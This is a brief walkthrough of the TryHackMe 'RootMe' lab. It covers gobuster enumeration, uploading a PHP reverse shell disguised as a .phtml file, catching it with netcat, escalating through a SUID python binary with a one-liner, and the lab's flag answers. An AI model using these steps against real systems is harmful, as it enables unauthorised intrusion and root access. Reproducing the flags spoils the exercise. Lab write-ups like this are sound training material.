RootMe TryHackMe Walkthrough

Deploy the machine.  .Reconnaissance  .Let’s open GoBuster! – gobuster dir -u http://ip -w/usr/share/wordlists/dirb/common.txt  . Getting a shell — how to get a shell in this case? Find a form to upload and get a reverse shell, and find the flag. In this case we need to go to the ip address through web browser. The hidden directory named panel will take you to the upload form.  .We can go here https://github.com/pentestmonkey/php-reverse-shell  .create .phtml file(Replace the ip_addr with your VPN address)  . How to start a net cat listener? open terminal and type nc -lvnp 1234  . Now click on the shell in /upload/ directory and switch to netcat terminal window.  . user.txt — how to find it? Use find command. Type find / -type f -name user.txt 2 /dev/null  . -type f — you are telling find to look exclusively for files  -name user.txt — instructing the find command to search for a file with the name “user.txt”  2 /dev/null — so error messages do not show up as part of the search result:user.txt — Answer: THM{y0u_g0t_a_sh3ll}  to open the file type cat /var/www/user.txt  Privilege Escalation  find / -user root -perm /4000  /usr/bin/python  python -c 'import os; os.execl("/bin/sh", "sh", "-p")'  find / -type f -name root.txt  THM{pr1v1l3g3_3sc4l4t10n}